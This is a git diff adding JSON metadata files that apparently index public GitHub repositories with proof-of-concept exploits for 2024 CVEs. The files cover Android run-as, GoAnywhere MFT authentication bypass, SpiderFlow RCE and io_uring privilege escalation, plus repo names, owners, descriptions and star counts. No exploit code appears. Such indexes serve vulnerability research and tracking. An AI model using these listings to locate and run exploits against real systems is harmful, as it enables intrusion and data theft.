"利用CVE-2024-0044 在Android12、13 没有root'下进行数据备份 用法.\/CVE-2024-0044-EXP.sh ", + "fork": false, + "created_at": "2024-07-15T08:45:44Z", + "updated_at": "2024-07-15T13:20:04Z", + "pushed_at": "2024-07-15T09:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836910059, + "name": "cve_2024_0044", + "full_name": "hunter24x24\/cve_2024_0044", + "owner": { + "login": "hunter24x24", + "id": 117602676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117602676?v=4", + "html_url": "https:\/\/github.com\/hunter24x24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunter24x24\/cve_2024_0044", + "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13", + "fork": false, + "created_at": "2024-08-01T20:14:22Z", + "updated_at": "2024-08-09T00:09:24Z", + "pushed_at": "2024-08-01T20:18:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837927961, + "name": "EvilDroid", + "full_name": "nexussecelite\/EvilDroid", + "owner": { + "login": "nexussecelite", + "id": 92028299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92028299?v=4", + "html_url": "https:\/\/github.com\/nexussecelite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nexussecelite\/EvilDroid", + "description": "EvilDroid automates the exploitation of CVE-2024-0044, installing malicious payloads on a target device and extracting sensitive data. It features automated ADB connection checks, APK pushing, UID extraction, payload generation, and real-time progress updates, providing a seamless and professional user experience.", + "fork": false, + "created_at": "2024-08-04T13:14:10Z", + "updated_at": "2024-12-21T23:23:19Z", + "pushed_at": "2024-08-05T14:13:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842052431, + "name": "CVE-2024-0044", + "full_name": "nahid0x1\/CVE-2024-0044", + "owner": { + "login": "nahid0x1", + "id": 76641588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76641588?v=4", + "html_url": "https:\/\/github.com\/nahid0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahid0x1\/CVE-2024-0044", + "description": "a vulnerability affecting Android version 12 & 13", + "fork": false, + "created_at": "2024-08-13T15:15:47Z", + "updated_at": "2024-12-21T23:23:45Z", + "pushed_at": "2024-08-13T15:20:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844326639, + "name": "cve-2024-0044", + "full_name": "MrW0l05zyn\/cve-2024-0044", + "owner": { + "login": "MrW0l05zyn", + "id": 344519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/344519?v=4", + "html_url": "https:\/\/github.com\/MrW0l05zyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrW0l05zyn\/cve-2024-0044", + "description": "CVE-2024-0044", + "fork": false, + "created_at": "2024-08-19T02:51:14Z", + "updated_at": "2024-12-16T07:45:51Z", + "pushed_at": "2024-08-24T06:32:58Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve-2024-0044", + "mobile-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 863974760, + "name": "CVE-2024-0044", + "full_name": "canyie\/CVE-2024-0044", + "owner": { + "login": "canyie", + "id": 31466456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31466456?v=4", + "html_url": "https:\/\/github.com\/canyie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/canyie\/CVE-2024-0044", + "description": "PoC and writeup for bypassing the initial patch of CVE-2024-0044, Android run-as any app vulnerability allowing privilege escalation from adb to installed app", + "fork": false, + "created_at": "2024-09-27T09:02:08Z", + "updated_at": "2025-01-06T21:27:29Z", + "pushed_at": "2024-09-30T12:48:08Z", + "stargazers_count": 133, + "watchers_count": 133, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 133, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 900948558, + "name": "CVE-2024-0044-", + "full_name": "Dit-Developers\/CVE-2024-0044-", + "owner": { + "login": "Dit-Developers", + "id": 173141993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173141993?v=4", + "html_url": "https:\/\/github.com\/Dit-Developers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dit-Developers\/CVE-2024-0044-", + "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13", + "fork": false, + "created_at": "2024-12-09T19:05:57Z", + "updated_at": "2024-12-09T19:16:22Z", + "pushed_at": "2024-12-09T19:16:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0049.json b/2024/CVE-2024-0049.json new file mode 100644 index 0000000000..ab12d9810d --- /dev/null +++ b/2024/CVE-2024-0049.json @@ -0,0 +1,64 @@ +[ + { + "id": 835201651, + "name": "frameworks_av_AOSP10_r33_CVE-2024-0049", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0049", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-0049", + "description": null, + "fork": false, + "created_at": "2024-07-29T11:12:32Z", + "updated_at": "2024-07-29T11:15:32Z", + "pushed_at": "2024-07-29T11:15:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851611620, + "name": "frameworks_av_android10_r33_CVE-2024-0049", + "full_name": "Aakashmom\/frameworks_av_android10_r33_CVE-2024-0049", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_av_android10_r33_CVE-2024-0049", + "description": null, + "fork": false, + "created_at": "2024-09-03T12:15:01Z", + "updated_at": "2024-09-03T12:32:35Z", + "pushed_at": "2024-09-03T12:32:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0195.json b/2024/CVE-2024-0195.json new file mode 100644 index 0000000000..d184c970a7 --- /dev/null +++ b/2024/CVE-2024-0195.json @@ -0,0 +1,133 @@ +[ + { + "id": 813399149, + "name": "CVE-2024-0195", + "full_name": "Cappricio-Securities\/CVE-2024-0195", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0195", + "description": "SpiderFlow Crawler Platform - Remote Code Execution", + "fork": false, + "created_at": "2024-06-11T02:34:34Z", + "updated_at": "2024-09-01T18:48:10Z", + "pushed_at": "2024-06-24T10:55:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-0195", + "pentesting", + "rce", + "spiderflow", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 850225780, + "name": "CVE-2024-0195-SpiderFlow", + "full_name": "gh-ost00\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-0195-SpiderFlow", + "description": "CVE-2024-0195 Improper Control of Generation of Code ('Code Injection')", + "fork": false, + "created_at": "2024-08-31T07:37:55Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-08-31T07:46:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851171964, + "name": "CVE-2024-0195-SpiderFlow", + "full_name": "MuhammadWaseem29\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/CVE-2024-0195-SpiderFlow", + "description": null, + "fork": false, + "created_at": "2024-09-02T15:01:15Z", + "updated_at": "2024-10-16T17:19:47Z", + "pushed_at": "2024-09-05T13:30:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853646582, + "name": "CVE-2024-0195-SpiderFlow", + "full_name": "hack-with-rohit\/CVE-2024-0195-SpiderFlow", + "owner": { + "login": "hack-with-rohit", + "id": 162045216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162045216?v=4", + "html_url": "https:\/\/github.com\/hack-with-rohit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hack-with-rohit\/CVE-2024-0195-SpiderFlow", + "description": null, + "fork": false, + "created_at": "2024-09-07T06:01:29Z", + "updated_at": "2024-09-07T06:03:43Z", + "pushed_at": "2024-09-07T06:03:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0197.json b/2024/CVE-2024-0197.json new file mode 100644 index 0000000000..de1c47fcac --- /dev/null +++ b/2024/CVE-2024-0197.json @@ -0,0 +1,33 @@ +[ + { + "id": 764157453, + "name": "CVE-2024-0197-POC", + "full_name": "ewilded\/CVE-2024-0197-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-0197-POC", + "description": "Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.", + "fork": false, + "created_at": "2024-02-27T15:25:58Z", + "updated_at": "2024-04-04T00:15:46Z", + "pushed_at": "2024-02-27T15:30:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0204.json b/2024/CVE-2024-0204.json new file mode 100644 index 0000000000..243518fc1c --- /dev/null +++ b/2024/CVE-2024-0204.json @@ -0,0 +1,126 @@ +[ + { + "id": 747380799, + "name": "CVE-2024-0204", + "full_name": "horizon3ai\/CVE-2024-0204", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-0204", + "description": "Authentication Bypass in GoAnywhere MFT", + "fork": false, + "created_at": "2024-01-23T20:16:14Z", + "updated_at": "2024-10-13T00:34:35Z", + "pushed_at": "2024-01-23T20:33:30Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 64, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 747426521, + "name": "CVE-2024-0204", + "full_name": "cbeek-r7\/CVE-2024-0204", + "owner": { + "login": "cbeek-r7", + "id": 117099647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4", + "html_url": "https:\/\/github.com\/cbeek-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2024-0204", + "description": "Scanning for vulnerable GoAnywhere MFT CVE-2024-0204", + "fork": false, + "created_at": "2024-01-23T22:42:58Z", + "updated_at": "2024-02-19T06:58:12Z", + "pushed_at": "2024-01-23T22:44:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747873972, + "name": "CVE-2024-0204", + "full_name": "m-cetin\/CVE-2024-0204", + "owner": { + "login": "m-cetin", + "id": 102237861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4", + "html_url": "https:\/\/github.com\/m-cetin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-0204", + "description": "This script exploits the CVE-2024-0204 vulnerability in Fortra GoAnywhere MFT, allowing the creation of unauthorized administrative users, for educational and authorized testing purposes.", + "fork": false, + "created_at": "2024-01-24T20:10:34Z", + "updated_at": "2024-04-05T14:01:39Z", + "pushed_at": "2024-01-24T20:17:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752489740, + "name": "CVE-2024-0204", + "full_name": "adminlove520\/CVE-2024-0204", + "owner": { + "login": "adminlove520", + "id": 32920883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4", + "html_url": "https:\/\/github.com\/adminlove520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adminlove520\/CVE-2024-0204", + "description": "GoAnywhere MFT", + "fork": false, + "created_at": "2024-02-04T01:40:46Z", + "updated_at": "2024-02-04T01:43:55Z", + "pushed_at": "2024-02-04T01:43:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0230.json b/2024/CVE-2024-0230.json new file mode 100644 index 0000000000..570a3aba08 --- /dev/null +++ b/2024/CVE-2024-0230.json @@ -0,0 +1,33 @@ +[ + { + "id": 804066469, + "name": "cve-2024-0230-blue", + "full_name": "keldnorman\/cve-2024-0230-blue", + "owner": { + "login": "keldnorman", + "id": 10332862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10332862?v=4", + "html_url": "https:\/\/github.com\/keldnorman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keldnorman\/cve-2024-0230-blue", + "description": "Helper script to POC of CVE-2024-0230 Bluetooth", + "fork": false, + "created_at": "2024-05-21T22:23:57Z", + "updated_at": "2024-11-18T07:23:30Z", + "pushed_at": "2024-05-22T20:34:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0235.json b/2024/CVE-2024-0235.json new file mode 100644 index 0000000000..509d0f794d --- /dev/null +++ b/2024/CVE-2024-0235.json @@ -0,0 +1,45 @@ +[ + { + "id": 809827626, + "name": "CVE-2024-0235", + "full_name": "Cappricio-Securities\/CVE-2024-0235", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0235", + "description": "EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure", + "fork": false, + "created_at": "2024-06-03T14:21:48Z", + "updated_at": "2024-06-24T10:19:50Z", + "pushed_at": "2024-06-24T10:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-0235", + "cve-2024-0235-exploit", + "cve-2024-0235-poc", + "cve-2024-0235-scanner", + "eventon-scanner", + "information-disclosure", + "wordpress-scanner", + "wpscan" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0305.json b/2024/CVE-2024-0305.json new file mode 100644 index 0000000000..efce228f8e --- /dev/null +++ b/2024/CVE-2024-0305.json @@ -0,0 +1,33 @@ +[ + { + "id": 788238757, + "name": "cve-2024-0305exp", + "full_name": "jidle123\/cve-2024-0305exp", + "owner": { + "login": "jidle123", + "id": 123531867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123531867?v=4", + "html_url": "https:\/\/github.com\/jidle123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jidle123\/cve-2024-0305exp", + "description": "cve-2024-0305可用的exp", + "fork": false, + "created_at": "2024-04-18T03:13:43Z", + "updated_at": "2024-04-30T12:00:02Z", + "pushed_at": "2024-04-19T04:23:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0311.json b/2024/CVE-2024-0311.json new file mode 100644 index 0000000000..5b9f949562 --- /dev/null +++ b/2024/CVE-2024-0311.json @@ -0,0 +1,33 @@ +[ + { + "id": 880277050, + "name": "CVE-2024-0311", + "full_name": "calligraf0\/CVE-2024-0311", + "owner": { + "login": "calligraf0", + "id": 115566010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115566010?v=4", + "html_url": "https:\/\/github.com\/calligraf0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/calligraf0\/CVE-2024-0311", + "description": "Exploit for CVE-2024-0311", + "fork": false, + "created_at": "2024-10-29T12:47:18Z", + "updated_at": "2024-12-03T02:45:06Z", + "pushed_at": "2024-10-30T16:07:45Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0324.json b/2024/CVE-2024-0324.json new file mode 100644 index 0000000000..f977e52d37 --- /dev/null +++ b/2024/CVE-2024-0324.json @@ -0,0 +1,33 @@ +[ + { + "id": 737888624, + "name": "CVE-2024-0324", + "full_name": "kodaichodai\/CVE-2024-0324", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0324", + "description": "a PoC for CVE-2024-0324\/WP Plugin - Profile Builder (<= 3.10.8)", + "fork": false, + "created_at": "2024-01-01T21:22:13Z", + "updated_at": "2024-09-11T05:42:48Z", + "pushed_at": "2024-09-10T16:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0352.json b/2024/CVE-2024-0352.json new file mode 100644 index 0000000000..92be2e7a09 --- /dev/null +++ b/2024/CVE-2024-0352.json @@ -0,0 +1,40 @@ +[ + { + "id": 814077972, + "name": "CVE-2024-0352", + "full_name": "Cappricio-Securities\/CVE-2024-0352", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0352", + "description": "Likeshop < 2.5.7.20210311 - Arbitrary File Upload", + "fork": false, + "created_at": "2024-06-12T09:46:26Z", + "updated_at": "2024-06-24T11:05:53Z", + "pushed_at": "2024-06-24T11:04:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-0352", + "pentesting", + "rce", + "vulnerability", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0379.json b/2024/CVE-2024-0379.json new file mode 100644 index 0000000000..e1a2a650ba --- /dev/null +++ b/2024/CVE-2024-0379.json @@ -0,0 +1,33 @@ +[ + { + "id": 855575005, + "name": "CVE-2024-0379", + "full_name": "kodaichodai\/CVE-2024-0379", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0379", + "description": "a PoC for CVE-2024-0379\/WP Plugin - Custom Twitter Feeds - A Tweets Widget or X Feed Widget (<= 2.2.1)", + "fork": false, + "created_at": "2024-09-11T05:12:47Z", + "updated_at": "2024-09-11T05:43:38Z", + "pushed_at": "2024-09-11T05:34:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0399.json b/2024/CVE-2024-0399.json new file mode 100644 index 0000000000..a722642f00 --- /dev/null +++ b/2024/CVE-2024-0399.json @@ -0,0 +1,33 @@ +[ + { + "id": 798415736, + "name": "CVE-2024-0399", + "full_name": "xbz0n\/CVE-2024-0399", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0399", + "description": null, + "fork": false, + "created_at": "2024-05-09T18:21:42Z", + "updated_at": "2024-05-09T18:24:59Z", + "pushed_at": "2024-05-09T18:24:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0507.json b/2024/CVE-2024-0507.json new file mode 100644 index 0000000000..08a7cf2fce --- /dev/null +++ b/2024/CVE-2024-0507.json @@ -0,0 +1,33 @@ +[ + { + "id": 773594791, + "name": "CVE-2024-0507_CVE-2024-0200-github", + "full_name": "convisolabs\/CVE-2024-0507_CVE-2024-0200-github", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2024-0507_CVE-2024-0200-github", + "description": "Exploits for GitHub Enterprise CVE-2024-0507 and CVE-2024-0200", + "fork": false, + "created_at": "2024-03-18T03:19:14Z", + "updated_at": "2024-09-05T14:32:14Z", + "pushed_at": "2024-09-05T14:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0509.json b/2024/CVE-2024-0509.json new file mode 100644 index 0000000000..92f9b1f3b5 --- /dev/null +++ b/2024/CVE-2024-0509.json @@ -0,0 +1,33 @@ +[ + { + "id": 855572557, + "name": "CVE-2024-0509", + "full_name": "kodaichodai\/CVE-2024-0509", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0509", + "description": "a PoC for CVE-2024-0509\/WP Plugin - WP 404 Auto Redirect to Similar Post (<= 5.4.14)", + "fork": false, + "created_at": "2024-09-11T05:05:05Z", + "updated_at": "2024-09-11T05:43:17Z", + "pushed_at": "2024-09-11T05:30:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0566.json b/2024/CVE-2024-0566.json new file mode 100644 index 0000000000..50fa6864f5 --- /dev/null +++ b/2024/CVE-2024-0566.json @@ -0,0 +1,33 @@ +[ + { + "id": 798394582, + "name": "CVE-2024-0566", + "full_name": "xbz0n\/CVE-2024-0566", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0566", + "description": null, + "fork": false, + "created_at": "2024-05-09T17:30:24Z", + "updated_at": "2024-05-09T17:35:02Z", + "pushed_at": "2024-05-09T17:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0582.json b/2024/CVE-2024-0582.json new file mode 100644 index 0000000000..356d8b0fa6 --- /dev/null +++ b/2024/CVE-2024-0582.json @@ -0,0 +1,171 @@ +[ + { + "id": 779314046, + "name": "io_uring_LPE-CVE-2024-0582", + "full_name": "ysanatomic\/io_uring_LPE-CVE-2024-0582", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2024-0582", + "description": "LPE exploit for CVE-2024-0582 (io_uring)", + "fork": false, + "created_at": "2024-03-29T14:45:22Z", + "updated_at": "2025-01-07T08:58:18Z", + "pushed_at": 